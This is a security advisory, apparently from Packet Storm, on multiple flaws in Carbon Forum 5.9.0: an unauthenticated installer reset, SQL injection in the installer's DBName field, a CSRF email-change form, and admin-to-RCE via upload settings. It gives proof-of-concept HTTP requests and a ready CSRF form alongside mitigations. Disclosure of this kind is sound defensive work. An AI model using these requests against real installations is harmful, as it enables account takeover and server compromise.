Carbon Forum 5.9.0 Cross Site Request Forgery / SQL Injection

2024-06-2400:00:00
bRpsd
packetstormsecurity.com
72
carbon forum
5.9.0
multiple exploits
csrf
sql injection
cross site request forgery
database settings
administrator password
sql
mariadb


`{-} Title => Carbon Forum 5.9.0 - Multiple Exploits  
{-} Author => bRpsd [[email protected]]  
{-} Date Release => 22 June, 2024  
{-} Vendor => Carbon Forum <= 5.9.0  
Homepage => https://www.94cb.com/  
Download => https://github.com/lincanbin/Carbon-Forum  
Vulnerable Versions => <= 5.9.0 (consistent with the Vendor line above; only 5.9.0 was actually tested)  
Tested Version => 5.9.0 on xampp Server.  
  
  
  
#######################################################################################  
Vulnerability #1 : Reset Administrator Password & Database settings (unauthenticated, via the leftover installer)  
URL: http://localhost/Carbon-Forum/install/  (handler: install/index.php)  
INFO: The install/ directory is neither removed nor disabled after installation. install/index.php accepts a POST carrying new database settings (DBHost, DBName, DBUser, DBPassword are all taken from the request, see the code excerpt under Vulnerability #2) and the excerpt shows no check for an already-existing configuration. An unauthenticated attacker can therefore re-run the installer, point the forum at a database of their choice and re-initialise it; the first account registered on the re-initialised forum is the administrator. Because the installer request is a plain POST with no anti-CSRF token visible, the same re-install could also be triggered cross-site from an administrator's browser. Mitigation: delete install/ after setup and make the installer refuse to run when the configuration file already exists.  
#######################################################################################  
  
  
  
#######################################################################################  
Vulnerability #2 : SQL Injection (install/index.php, DBName parameter)  
Vulnerable Code: /Carbon-Forum/install/index.php — the sink is the string-concatenated statement `"CREATE DATABASE IF NOT EXISTS " . $DBName . ";"` near the end of the excerpt. The SCHEMATA lookup immediately above it is parameterised (`:DBName`), but the CREATE statement is not. DBUser and DBPassword are passed to the PDO wrapper as connection credentials, and DBHost into the DSN, so none of them reach the SQL string; the injectable value is DBName.  
if ($_SERVER['REQUEST_METHOD'] == 'POST') {  
$fp = fopen(__DIR__ . '/database.sql', "r") or die("SQL文件无法打开。 The SQL File could not be opened.");  
//dobefore  
if (isset($_POST["Language"]) && isset($_POST["DBHost"]) && isset($_POST["DBName"]) && isset($_POST["DBUser"]) && isset($_POST["DBPassword"])) {  
$Language = $_POST['Language'];  
$DBHost = $_POST['DBHost'];  
$DBName = $_POST['DBName'];  
$DBUser = $_POST['DBUser'];  
$DBPassword = $_POST['DBPassword'];  
$SearchServer = $_POST['SearchServer'];  
$SearchPort = $_POST['SearchPort'];  
$EnableMemcache = $_POST['EnableMemcache'];  
$MemCachePrefix = $_POST['MemCachePrefix'];  
} else {  
die("An Unexpected Error Occured!");  
}  
//$WebsitePath = $_POST['WebsitePath'];  
$WebsitePath = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];  
if (preg_match('/(.*)\/install/i', $WebsitePath, $WebsitePathMatch)) {  
$WebsitePath = $WebsitePathMatch[1];  
} else {  
$WebsitePath = '';  
}  
//初始化数据库操作类  
require('../library/PDO.class.php');  
$DB = new Db($DBHost, 3306, '', $DBUser, $DBPassword);  
$DatabaseExist = $DB->single("SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA WHERE SCHEMA_NAME = :DBName", array('DBName' => $DBName));  
if (empty($DatabaseExist)) {  
$DB->query("CREATE DATABASE IF NOT EXISTS " . $DBName . ";");  
}  
  
POC Request:  
POST http://localhost/Carbon-Forum/install/?  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br, zstd  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 173  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/Carbon-Forum/install/  
Cookie: CarbonBBS_View=desktop; CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; PHPSESSID=addf2aa242dcb91d00faf41e6d6b07b3  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Language=en&DBHost=localhost&DBName=&DBUser=test'&DBPassword=&SearchServer=&SearchPort=&EnableMemcache=false&MemCachePrefix=carbon_&submit=安 装 / Install  
  
Response:  
SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' at line 1  
You can find the error back in the log.  
  
Note: the request above sends an empty DBName, so the server executes `CREATE DATABASE IF NOT EXISTS ;`, which is consistent with the "near ''" syntax error shown; the quote in DBUser=test' is not what triggers the error. The response proves that the value reaches the SQL string unescaped (and that the installer leaks raw database error messages), but it is not itself an injection payload — a working payload goes in DBName. Two caveats for exploitation: (1) whether a stacked second statement after the CREATE actually executes depends on the driver configuration in library/PDO.class.php (not shown here); (2) the statement runs on whichever server DBHost/DBUser/DBPassword authenticate to, so against the target's own database the attacker needs valid credentials for it (on a default XAMPP install the root account commonly has no password).  
#######################################################################################  
  
  
################################################################################################################  
Vulnerability #3 : CSRF - Change a user's email address  
URL: http://localhost/Carbon-Forum/settings  
Method: POST  
Parameter : UserMail (Action=UpdateUserInfo)  
Code: Carbon-Forum/controller/settings.php — the UpdateUserInfo branch below reads UserMail straight from the POST body with no anti-CSRF token, Origin or Referer check visible in the excerpt; IsEmail() only validates the format and there is no re-authentication or confirmation step. Authentication appears to be cookie-based (CarbonBBS_UserID / CarbonBBS_UserCode in the requests above), so a victim who is logged in and submits the form below has their email replaced with an attacker-chosen address. Caveats: modern browsers default cookies to SameSite=Lax, which withholds them on cross-site POST unless the application sets SameSite=None — check the forum's Set-Cookie headers before relying on this; and whether an email change escalates to account takeover depends on whether the password-reset flow trusts UserMail, which is not demonstrated here. The `[email protected]` placeholder in the form is a redaction; substitute an attacker-controlled address. Mitigation: a per-session CSRF token verified on every state-changing POST.  
  
  
POC:  
case 'UpdateUserInfo':  
$CurUserInfo['UserSex'] = intval(Request('POST', 'UserSex', 0));  
$CurUserInfo['UserMail'] = IsEmail(Request('POST', 'UserMail', $CurUserInfo['UserMail'])) ? Request('POST', 'UserMail', $CurUserInfo['UserMail']) : $CurUserInfo['UserMail'];  
$CurUserInfo['UserHomepage'] = CharCV(Request('POST', 'UserHomepage', $CurUserInfo['UserHomepage']));  
$CurUserInfo['UserIntro'] = CharCV(Request('POST', 'UserIntro', $CurUserInfo['UserIntro']));  
$UpdateUserInfoResult = UpdateUserInfo(array(  
'UserSex' => $CurUserInfo['UserSex'],  
'UserMail' => $CurUserInfo['UserMail'],  
'UserHomepage' => $CurUserInfo['UserHomepage'],  
'UserIntro' => $CurUserInfo['UserIntro']  
));  
if ($UpdateUserInfoResult) {  
$UpdateUserInfoMessage = $Lang['Profile_Modified_Successfully'];  
  
<form method='POST' action='http://localhost/Carbon-Forum/settings'>  
<input type="hidden" name="Action" value="UpdateUserInfo">  
<input type="hidden" name="UserSex" value="0">  
<input type="hidden" name="UserMail" value="[email protected]">  
<input type="hidden" name="UserHomepage" value="">  
<input type="hidden" name="UserIntro" value="">  
<input type='submit' value='submit'>  
</form>  
################################################################################################################  
  
  
#######################################################################################  
Vulnerability #4 : Arbitrary File Upload - RCE [Authenticated, administrator]  
Info: An authenticated administrator can edit the editor upload configuration from the dashboard (Action=Parameter, UploadParameters field) and extend the fileAllowFiles / imageAllowFiles extension lists; after adding an executable extension such as .php, a file uploaded through the editor's upload action is stored under /upload/ and can be requested directly. Note that the request below is the unmodified default configuration — it must be edited to add the extension before it demonstrates anything. Because this requires administrator privileges, on its own it is admin-to-RCE; it becomes reachable by an unauthenticated attacker only when chained with #1 (installer reset to obtain admin) or delivered cross-site against an administrator, since this POST likewise shows no anti-CSRF token. Whether an uploaded .php file is actually executed depends on the web server's handler configuration for the upload directory.  
POC POST:  
http://localhost/Carbon-Forum/dashboard#dashboard4  
Host: localhost  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br, zstd  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 14662  
Origin: http://localhost  
Connection: keep-alive  
Referer: http://localhost/Carbon-Forum/dashboard  
Cookie: CarbonBBS_UserID=5; CarbonBBS_UserExpirationTime=1721643860; CarbonBBS_UserCode=3ff84d77640629e72e311cd7a52e5df7; CarbonBBS_View=desktop  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1  
Action=Parameter&UploadParameters=/* 前后端通信相关的配置,注释只允许使用多行方式 */ { /* 上传图片配置项 */ "imageActionName": "uploadimage", /* 执行上传图片的action名称 */ "imageFieldName": "upfile", /* 提交的图片表单名称 */ "imageMaxSize": 4096000, /* 上传大小限制,单位B */ "imageAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 上传图片格式显示 */ "imageCompressEnable": true, /* 是否压缩图片,默认是true */ "imageCompressBorder": 1600, /* 图片压缩最长边限制 */ "imageInsertAlign": "none", /* 插入的图片浮动方式 */ "imageUrlPrefix": "", /* 图片访问路径前缀 */ "imagePathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ /* (unknown) 会替换成原文件名,配置这项需要注意中文乱码问题 */ /* {rand:6} 会替换成随机数,后面的数字是随机数的位数 */ /* {time} 会替换成时间戳 */ /* {yyyy} 会替换成四位年份 */ /* {yy} 会替换成两位年份 */ /* {mm} 会替换成两位月份 */ /* {dd} 会替换成两位日期 */ /* {hh} 会替换成两位小时 */ /* {ii} 会替换成两位分钟 */ /* {ss} 会替换成两位秒 */ /* 非法字符 \ : * ? " < > | */ /* 具请体看线上文档: fex.baidu.com/ueditor/#use-format_upload_filename */ /* 涂鸦图片上传配置项 */ "scrawlActionName": "uploadscrawl", /* 执行上传涂鸦的action名称 */ "scrawlFieldName": "upfile", /* 提交的图片表单名称 */ "scrawlPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "scrawlMaxSize": 2048000, /* 上传大小限制,单位B */ "scrawlUrlPrefix": "", /* 图片访问路径前缀 */ "scrawlInsertAlign": "none", "scrawlAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 截图工具上传 */ "snapscreenActionName": "uploadimage", /* 执行上传截图的action名称 */ "snapscreenPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "snapscreenUrlPrefix": "", /* 图片访问路径前缀 */ "snapscreenInsertAlign": "none", /* 插入的图片浮动方式 */ /* 抓取远程图片配置 */ "catcherLocalDomain": ["127.0.0.1", "localhost", "img.baidu.com"], "catcherActionName": "catchimage", /* 执行抓取远程图片的action名称 */ "catcherFieldName": "source", /* 提交的图片列表表单名称 */ "catcherPathFormat": "/upload/image/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "catcherUrlPrefix": "", /* 图片访问路径前缀 */ "catcherMaxSize": 2048000, /* 上传大小限制,单位B */ "catcherAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 抓取图片格式显示 
*/ /* 上传视频配置 */ "videoActionName": "uploadvideo", /* 执行上传视频的action名称 */ "videoFieldName": "upfile", /* 提交的视频表单名称 */ "videoPathFormat": "/upload/video/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "videoUrlPrefix": "", /* 视频访问路径前缀 */ "videoMaxSize": 20480000, /* 上传大小限制,单位B,默认20MB */ "videoAllowFiles": [ ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid"], /* 上传视频格式显示 */ /* 上传文件配置 */ "fileActionName": "uploadfile", /* controller里,执行上传视频的action名称 */ "fileFieldName": "upfile", /* 提交的文件表单名称 */ "filePathFormat": "/upload/file/{yyyy}{mm}{dd}/{time}{rand:6}", /* 上传保存路径,可以自定义保存路径和文件名格式 */ "fileUrlPrefix": "", /* 文件访问路径前缀 */ "fileMaxSize": 2048000, /* 上传大小限制,单位B,默认2MB */ "fileAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ], /* 上传文件格式显示 */ /* 列出指定目录下的图片 */ "imageManagerActionName": "listimage", /* 执行图片管理的action名称 */ "imageManagerListPath": "/upload/image/", /* 指定要列出图片的目录 */ "imageManagerListSize": 60, /* 每次列出文件数量 */ "imageManagerUrlPrefix": "", /* 图片访问路径前缀 */ "imageManagerInsertAlign": "none", /* 插入的图片浮动方式 */ "imageManagerAllowFiles": [".png", ".jpg", ".jpeg", ".gif", ".bmp"], /* 列出的文件类型 */ /* 列出指定目录下的文件 */ "fileManagerActionName": "listfile", /* 执行文件管理的action名称 */ "fileManagerListPath": "/upload/file/", /* 指定要列出文件的目录 */ "fileManagerUrlPrefix": "", /* 文件访问路径前缀 */ "fileManagerListSize": 60, /* 每次列出文件数量 */ "fileManagerAllowFiles": [ ".png", ".jpg", ".jpeg", ".gif", ".bmp", ".flv", ".swf", ".mkv", ".avi", ".rm", ".rmvb", ".mpeg", ".mpg", ".ogg", ".ogv", ".mov", ".wmv", ".mp4", ".webm", ".mp3", ".wav", ".mid", ".rar", ".zip", ".tar", ".gz", ".7z", ".bz2", ".cab", ".iso", ".doc", ".docx", ".xls", 
".xlsx", ".ppt", ".pptx", ".pdf", ".txt", ".md", ".xml" ] /* 列出的文件类型 */ }&TextFilterParameter=/* 关键词过滤相关的配置,注释只允许使用多行方式 */ { /* 关键词均支持正则表达式,过多的过滤会影响性能 "fuck" : "f**k", 以上规则表示发表含fuck的内容,会被过滤为f**k "negro" : [false, 30], Don't issue text with "negro", or it will freeze for 30 seconds. "蛤" : [false, 30], 以上规则禁止发布含“蛤”的内容,并且尝试发表该内容的用户会被续(jin)掉(yan)30秒生命 "negro" : ["black", 30], "包子" : ["维尼", 30], 以上规则表示发表含"包子"的内容,会被过滤为"维尼",并且在内容发表成功后,需要再等30秒才能发言 */ /* "fuck" : "f**k", "negro" : [false, 30], "蛤" : [false, 30], "negro" : ["black", 30], "包子" : ["维尼", 30] */ }&submit=Save settings  
  
#######################################################################################  
  
  
  
#######################################################################################  
Vulnerability #5 : Outdated PHPMailer library (version finding only; no exploit shown)  
File: /Carbon-Forum/library/PHPMailer.class.php  
Version: $Version = '5.2.16';  — this predates the 5.2.18 / 5.2.20 fixes for the mail()-transport Sender-argument RCE (CVE-2016-10033 / CVE-2016-10045). Exploitability depends on whether any forum code path passes user-controlled data into the From/Sender address while using the mail() transport; the advisory does not demonstrate this, so treat it as a supply-chain finding to verify and upgrade the bundled library to a supported PHPMailer release.  
#######################################################################################  
`
